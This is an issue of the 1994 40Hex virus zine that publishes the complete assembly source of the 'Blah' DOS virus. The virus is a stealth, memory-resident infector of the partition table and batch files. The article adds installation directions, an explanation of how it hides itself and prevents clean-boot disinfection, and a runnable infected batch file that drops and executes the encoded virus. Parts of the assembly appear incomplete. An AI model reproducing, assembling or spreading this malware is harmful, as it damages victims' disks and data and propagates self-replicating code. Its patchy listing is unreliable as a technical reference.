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40Hex Issue 14 File 005

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 · 13 Jul 2024

40Hex Number 14 Volume 5 Issue 1                                      File 005 

The Blah virus is a memory-resident, stealth, multipartite partition table/
batch file virus. What follows is the raw source file. After the source file
is a batch file infected with Blah which demonstrates the workings of the
virus. To install the virus, simply run this batch file. Or you can assemble
the source, run the output file, and then execute a batch file. Be cautious
when running this virus, however, since it immediately infects the partition
table and your hard drive will become unavailable should you boot from
diskette. You have been warned!

comment ~
The Blah virus
The world's only stealth, multipartite PT/BAT infector
Written by Dark Angel at the end of 1994

This virus is "mostly stealth" and "mostly harmless". It infects the
partition table on hd0 as well as batch files.

To install the virus, simply assemble this source to a COM file and run the
output. The virus will then reside on the partition table of the first hard
drive of the computer.

The partition table portion of the virus loads itself into the slack space
between the partition table and the first disk partition. The virus assumes
the first disk partition is the one closest to the partition table, which is
reasonable. It only infects the partition table on the first physical hard
drive, since that will always be loaded anyway. The original partition table
is stored following the virus code in the aforementioned slack space.

Since the partition table infector does not copy the partition table itself
into its code, several effects result. First, the system will not recognise
the hard drive if it is booted from a floppy. This can be considered a useful
side-effect, since it prevents disinfection via a clean boot. Additionally,
when modifying the virus, one must take care to keep the word 0AA55 at offset
01FE in the file, or else the BIOS will not recognise the partition table as
a valid one.

If you edit a batch file while the virus is in memory, the batch file will
become infected by the virus, but will load into memory as if it were
uninfected. When you save the file, it will remain uninfected. However, once
you run the batch file, it will again become infected.

This virus adds 3004 bytes to batch files. However, this file will assemble
to 1148 bytes, since an encoded form of this file is written to batch files.

The virus prepends its own code to the batch files that it infects. This
code consists of lines which 1. create an executable file 2. run this
executable file 3. delete the executable file and 4. reruns the batch file.
The code which creates the executable file is simply a bunch of ECHO
statements which are redirected into a file. These characters, when run,
will run the code you see below. The bytes following the ECHO consist of
code which reassembles and runs the code below and the data of the virus,
which is encoded in a special printable text-only format. The virus removes
this file after it has executed it in order to cover its traces. Finally,
the virus runs the batch file again. This is to allow the stealth to work
properly. The stealth works by bumping up all read requests on infected
files by an amount equal to the size of the virus prepended text. The stealth
is designed to not take effect until after the third file open it sees.
Since DOS opens batch files each time it needs to execute the next command,
this is the equivalent of waiting until after two statements have executed.
This leaves enough time to remove the temporary file and reexecute the batch
file. Now the stealth kicks in and DOS doesn't even see the virus code in
the batch file.

The virus hides the filelength increase on directory searches (in .BAT files
only, of course). It also hides itself from reads (with handle calls only).
It infects when a .BAT file is opened. It stamps files with a 62 second mark,
but that is for the findfirst/findnext routine only. The checks for previous
infection do not make any assumptions based on the file creation time.

The virus also prevents overwriting of itself in the partition table. It also
redirects attempts to view absolute sector 0. However, it does not try to
stop reads to other parts of the disk that are infected, i.e. the sectors
immediately following the first.

The source code to the decoder (the raw text is included in the virus) can
be found at the end.

Anyway, this virus was written mostly because I felt like doing something
lame. I think I succeeded, with only a modest effort.

Dark Angel, Phalcon/Skism, 31 December 1994

Happy New Year's!

.model tiny
.radix 16

org 0
our_buffer label byte

org 80
line label byte

org 100

viruslength = (heap-blah)*2+endcleanup-decoder+((heap-blah+1f)/20)*0f
resK = (end_all - our_buffer + 3ff) / 400
resP = resK * 40
sector_length = (heap - blah + 1ff) / 200

blah: xor bp,bp
xor si,si

cmp [si],20CDh ; check if there is a PSP
jz in_com ; to see if we are in COM or
; boot (don't just check SP
; since COM might not load in
; a full segment if memory is
; sparse)
inc bp

; hey! we're in the boot sector or the partition table
; assume in partition table for the time being
push si
pop ss
mov sp,-2 ; doesn't really matter

mov ax,200 + sector_length
mov es,si
mov bx,7c00 + 200
mov cx,2
mov dx,80
int 13

mov dx,0f800

db 0ea
dw offset install, 7b0

in_com: mov dx,0f904

mov ah,62 ; get the PSP
int 21 ; also tells existing copies
; to disable themselves
; (for NetWare compatability)
dec bx ; go to MCB so we can
mov ds,bx ; twiddle with it

sub word ptr [si+3],resP ; reserve two K of memory
sub word ptr [si+12],resP ; in DOS for the virus

install: mov cs:init_flag,dl
mov byte ptr cs:i13_patch,dh

mov ds,si ; reserve two K of memory
mov dx,word ptr ds:413
sub dx,resK
mov word ptr ds:413,dx ; from the BIOS count
mov cl,6
shl dx,cl ; K -> paragraph

les ax,ds:84
mov cs:old_i21,ax
mov cs:old_i21+2,es

les ax,ds:4c
mov cs:old_i13,ax
mov cs:old_i13+2,es

mov es,dx
push cs
pop ds
mov si,offset blah
mov di,si
mov cx,(offset end_zopy - blah + 1) / 2
rep movsw

mov es,cx

mov es:4c,offset i13
mov es:4e,dx

or bp,bp
jz exit_com

exit_boot: mov ax,201 ; read the original partition
xor cx,cx ; table to 0:7C00
mov dx,80 ; since the i13 handler is in
mov es,cx ; place, we can load from where
inc cx ; the partition table should
mov bx,7c00 ; be, instead of where it
push es bx ; actually is
jmp dword ptr [bp+4bh] ; int 13 / iret

exit_com: mov es:84,offset i21
mov es:86,dx

infect_hd: push ax cx dx bx ds es

push cs cs
pop es ds

mov ax,201
mov bx,100 + (sector_length*200)
mov cx,1
mov dx,80
call call_i13 ; get original partition table

adj_ofs = (100 + (sector_length*200))

cmp word ptr cs:[adj_ofs+decoder-blah],'e@'
jz already_infected

mov al,ds:[adj_ofs+1C0]
or ax,ds:[adj_ofs+1C2]
jnz enough_room
cmp byte ptr ds:[adj_ofs+1C1],sector_length+1
jbe already_infected ; not enough room for virus

enough_room: mov ax,301 + sector_length ; write to disk
mov bx,100 ; cx = 1, dx = 80 already
call call_i13

pop es ds bx dx cx ax

db 'Blah virus',0
db '(DA/PS)',0

; I indulged myself in writing the decoder; it's rather much larger than it
; needs to be. This was so I could insert random text strings into the code.
; The decoder creates a file which, when run, will execute the encoded file.
; In this case, we are encoding the virus. See the beginning for a complete
; explanation of how the virus works.
decoder db '@echo øPSBAT!ø¿PS½'
fsize dw -1 * (heap - blah)
db 'XYZ÷ÝU¾S¹ 2é¬H‹Ø¬,AêMtâñ ít­ëå>',0ba,'.com',0Dh,0A
db '@echo ¸üü2àYP—¸ó¤«¸ëë2૾PS¿DBïDAÃ'
endline: db '>>',0ba,'.com',0Dh,0A
; The next line is to ease the coding. This way, the same number of statements
; pass between the running of the temporary program and the reloading of the
; batch file for both AUTOEXEC.BAT on bootup and regular batch files. Running
; the temporary file installs the virus into memory. Note the following lines
; are never seen by the command interpreter if the virus is already resident.
enddecoder: db '@if %0. == . ',0ba,0Dh,0A
db '@',0ba,0Dh,0A
db '@del ',0ba,'.com',0Dh,0A
; The next line is necessary because autoexec.bat is loaded with %0 == NULL
; by COMMAND.COM. Without this line, the virus could not infect AUTOEXEC.BAT,
; which would be a shame.
db '@if %0. == . autoexec',0Dh,0A
db '@%0',0Dh,0A

chain_i13: push [bp+6]
call dword ptr cs:old_i13
pop [bp+6]

call_i13: pushf
call dword ptr cs:old_i13

write: mov ah,40
calli21: pushf
call dword ptr cs:old_i21

check_signature:and word ptr es:[di+15],0
push es di cs cs
pop ds es
mov ah,3f
cwd ; mov dx,offset our_buffer
mov cx,enddecoder - decoder
call calli21

mov si,offset decoder
mov di,dx
mov cx,enddecoder - decoder
rep cmpsb

pop di es

i13: clc ; this is patched to
jnc i13_patch ; disable the i13 handler
jmp disabled_i13 ; this is a stupid hiccup

i13_patch: clc ; this is patched to once
jc multipartite_installed ; i21 is installed

push ax bx ds es

mov ax,0AA55 ; offset 02FE of the virus
; this is the PT signature

xor ax,ax
mov es,ax

lds bx,es:84
mov ax,ds
cmp ax,cs:old_i21+2
jz not_DOS_yet
or ax,ax ; Gets set to address in zero
jz not_DOS_yet ; segment temporarily. ignore.
cmp ax,800
ja not_DOS_yet
cmp ax,es:28*4+2 ; make sure int 28 handler
jnz not_DOS_yet ; the same (OS == DOS?)
cmp bx,cs:old_i21
jz not_DOS_yet
install_i21: push cs
pop ds
mov ds:old_i21,bx
mov ds:old_i21+2,ax
mov es:84,offset i21
mov es:86,cs
inc byte ptr ds:i13_patch
not_DOS_yet: pop es ds bx ax
push bp
mov bp,sp

cmp cx,sector_length + 1 ; working on virus area?
ja jmp_i13

cmp dx,80
jnz jmp_i13

cmp ah,2 ; reading partition table?
jz stealth_i13
not_read: cmp ah,3 ; write over partition table?
jnz jmp_i13
call infect_hd

push si cx bx ax

mov al,1

cmp cl,al ; are we working on partition
jnz not_write_pt ; table at all?

mov cx,sector_length + 1
call chain_i13
jc alt_exit_i13

not_write_pt: pop ax
push ax

sub al,sector_length + 2 ; calculate number of remaining
add al,cl ; sectors to write
js alt_exit_i13
jz alt_exit_i13

push cx
sub cx,sector_length + 2 ; calculate number of sectors
neg cx ; skipped
addd: add bh,2 ; and adjust buffer pointer
loop addd ; accordingly
pop cx

or ah,1 ; ah = 1 so rest_stealth makes
jmp short rest_stealth ; it a write

jmp_i13: pop bp
disabled_i13: jmp dword ptr cs:old_i13

stealth_i13: push si cx bx ax
call infect_hd

mov si,bx

mov al,1

cmp cl,al
jnz not_read_pt

mov cx,sector_length + 1
call chain_i13
jc alt_exit_i13

add bh,2 ; adjust buffer ptr

not_read_pt: pop ax
push ax
push di ax
mov di,bx
mov ah,0
add al,cl

cmp al,sector_length + 2
jb not_reading_more
mov al,sector_length + 2
not_reading_more:cmp cl,1
jnz not_pt
dec ax
not_pt: sub al,cl
jz dont_do_it ; resist temptation!

mov cl,8
shl ax,cl ; zero out sectors
mov cx,ax
cbw ; clear ax
rep stosw
mov bx,di ; adjust buffer

dont_do_it: pop ax di
mov ah,0

mov cl,9
sub si,bx
neg si
shr si,cl
sub ax,si
jz alt_exit_i13

rest_stealth: sub ax,-200
mov cx,sector_length + 2
call chain_i13

alt_exit_i13: pop bx
mov al,bl
pop bx cx si bp

i24: mov al,3

chain_i21: push [bp+6] ; push flags on stack again
call dword ptr cs:old_i21
pushf ; put flags back onto caller's
pop [bp+6] ; interrupt stack area

infect_bat: mov cx,200 ; conquer the holy batch file!
move_up: sub bp,cx
jns $+6
add cx,bp
xor bp,bp
mov es:[di+15],bp ; move file pointer

mov ah,3f ; read in portion of the file
mov dx,offset big_buffer
call calli21

add word ptr es:[di+15],viruslength
sub word ptr es:[di+15],ax
call write ; move the data up

or bp,bp
jnz move_up

move_up_done: mov word ptr es:[di+15],bp ; go to start of file

mov cx,enddecoder - decoder
mov dx,offset decoder
call write

push es di cs
pop es

mov bp,heap - blah
mov si,offset blah
encode_lines: mov di,offset line
mov cx,20
encode_line: lodsb
push ax
and ax,0F0
inc ax
pop ax
and ax,0F
add al,'A'
dec bp
jz finished_line
loop encode_line

finished_line: mov cx,6
mov dx,offset decoder
call write

mov cx,di
mov dx,offset line
sub cx,dx
call write

mov cx,enddecoder-endline
mov dx,offset endline
call write

or bp,bp
jnz encode_lines

pop di es

mov cx,endcleanup - enddecoder
mov dx,offset enddecoder
call write


; check neither extension nor timestamp in case file was renamed or
; something like that

; will hang without this stealth because of the line
; @%0 that it adds to batch files
handle_read: push es di si ax cx dx ds bx

xor si,si

cmp cs:init_flag,0
jnz dont_alter_read

mov ax,1220
int 2f
jc dont_alter_read

xor bx,bx
mov bl,es:di
mov ax,1216
int 2f ; es:di now -> sft
jc dont_alter_read

pop bx ; restore the file handle
push bx

push es:[di+15] ; save current offset

call check_signature
mov si,viruslength
pop bx
jz hide_read
xor si,si
hide_read: add bx,si
mov es:[di+15],bx
dont_alter_read:pop bx ds dx cx ax

call chain_i21

sub es:[di+15],si

pop si di es
_iret: pop bp

handle_open: cmp cs:init_flag,0
jz keep_going
dec cs:init_flag
keep_going: call chain_i21
jc _iret
push ax cx dx bp si di ds es

xchg si,ax ; filehandle to si

mov ax,3524
int 21
push es bx ; save old int 24 handler

xchg bx,si ; filehandle back to bx
push bx
mov si,dx ; ds:si->filename

push ds
mov ax,2524 ; set new int 24 handler
push cs
pop ds
mov dx,offset i24
call calli21
pop ds


find_extension: lodsb ; scan filename for extension
or al,al ; no extension?
jz dont_alter_open
cmp al,'.' ; extension?
jnz find_extension

lodsw ; check if it's .bat
or ax,2020
cmp ax,'ab'
jnz dont_alter_open
or al,20
cmp al,'t'
jnz dont_alter_open

mov ax,1220 ; if so, get jft entry
int 2f
jc dont_alter_open

xor bx,bx
mov bl,es:di
mov ax,1216 ; now get SFT
int 2f
jc dont_alter_open

pop bx ; recover file handle
push bx

mov bp,word ptr es:[di+11] ; save file size
or bp,bp
jz dont_alter_open

mov byte ptr es:[di+2],2 ; change open mode to r/w
mov ax,word ptr es:[di+0dh] ; get file time
and ax,not 1f ; set the seconds field
or ax,1f
mov word ptr es:[di+0dh],ax

call check_signature
jz dont_alter1open ; infected already!

call infect_bat

dont_alter1open:or byte ptr es:[di+6],40 ; set flag to set the time
and word ptr es:[di+15],0
mov byte ptr es:[di+2],0 ; restore file open mode
dont_alter_open:pop bx dx ds
mov ax,2524
call calli21
pop es ds di si bp dx cx ax bp

findfirstnext: call chain_i21 ; standard file length
push ax bx si ds es ; hiding
cmp al,-1
jz dont_alter_fffn

mov ah,2f ; get the DTA to es:bx
int 21
push es
pop ds
cmp byte ptr [bx],-1
jnz not_extended
add bx,7
; won't hide if extension is changed, but otherwise gives it away by disk
; accesses
not_extended: cmp word ptr [bx+9],'AB'
jnz dont_alter_fffn
cmp byte ptr [bx+0bh],'T'
jnz dont_alter_fffn
cmp word ptr [bx+1dh],viruslength
jb dont_alter_fffn
mov al,[bx+17]
and al,1f
cmp al,1f
jnz dont_alter_fffn
and byte ptr [bx+17],not 1f
sub word ptr [bx+1dh],viruslength
dont_alter_fffn:pop es ds si bx ax bp

inst_check: cmp bx,0f904
jnz jmp_i21
push si di cx
mov si,offset blah
mov di,100
mov cx,offset i13 - offset blah
db 2e
rep cmpsb
jnz not_inst

inc byte ptr cs:i13 ; disable existing copy of
inc byte ptr cs:i21 ; the virus

not_inst: pop si di cx
jmp short jmp_i21
i21: clc
jc disabled_i21
push bp
mov bp,sp
cmp ah,11
jz findfirstnext
cmp ah,12
jz findfirstnext
cmp ah,62
jz inst_check
cmp ax,3d00
jnz not_open
jmp handle_open
not_open: cmp ah,3f
jnz jmp_i21
jmp handle_read

jmp_i21: pop bp
disabled_i21: db 0ea ; call original int 21
heap: ; g
old_i21 dw ?, ? ; handler
old_i13 dw ?, ?
init_flag db ?

org 100 + ((end_zopy - blah + 1ff) / 200) * 200
orig_PT db 200 dup (?)
big_buffer db 200 dup (?)

end blah

; The complimentary decoder included with every copy of blah

.model tiny
.radix 16
org 100

decode: db 'øPSBAT!ø' ; translates to some random code

mov di,offset buffer
db 0bdh ; mov bp, datasize
datasize dw 'Y0'

db 'XYZ' ; more text that is also code

neg bp
push bp
mov si,offset databytes
keep_going: mov cx,2020
xor ch,cl
decode_line: lodsb
dec ax ; tens digit
mov bx,ax
sub al,'A'
add ax,bx

dec bp
jz all_done
loop decode_line
all_done: or bp,bp
jz no_more
lodsw ; skip CRLF
jmp keep_going

db 0Dh,0A ; split file into two lines

no_more: mov ax,0fcfc
xor ah,al
pop cx ; how many bytes to move
push ax
xchg ax,di
mov ax,0a4f3
mov ax,0ebebh ; flush prefetch queue
xor ah,al

mov si,offset buffer
mov di,100 + 4144
sub di,'AD'


db 0Dh,0Ah ; split the file s'more


org 5350 ; 50/53 == P/S

end decode
@echo øPSBAT!ø¿PS½îúXYZ÷ÝU¾S¹ 2é¬H‹Ø¬,AêMtâñ ít­ëå>º.com
@echo ¸üü2àYP—¸ó¤«¸ëë2૾PS¿DBïDAÃ>>º.com
@echo áF1O±K!OaDaPaNNKAAaFaDaIaP!A±IñMñM1CáAQJQA‘H±IñD¡E¡L±IáLáL1CáA>>º.com
@echo !O!A±KNKAA±KNKAAaEaFaM!A±K!OaDaPaNNKAAaJaG!A!F1A!O!A1N1N!A>>º.com
@echo !FOP±KñFDáI±OñNPñM¡MKÁAqEQL1M!OqFñH¡NN!A!A1NaCaBqFAO¡MM!A>>º.com
@echo 1NA1NqFDáJÁOñOAñM1PqFDáJqJñOQNáK>>º.com
@if %0. == . º

@del º.com
@if %0. == . autoexec
@echo Beware.....PLURG!

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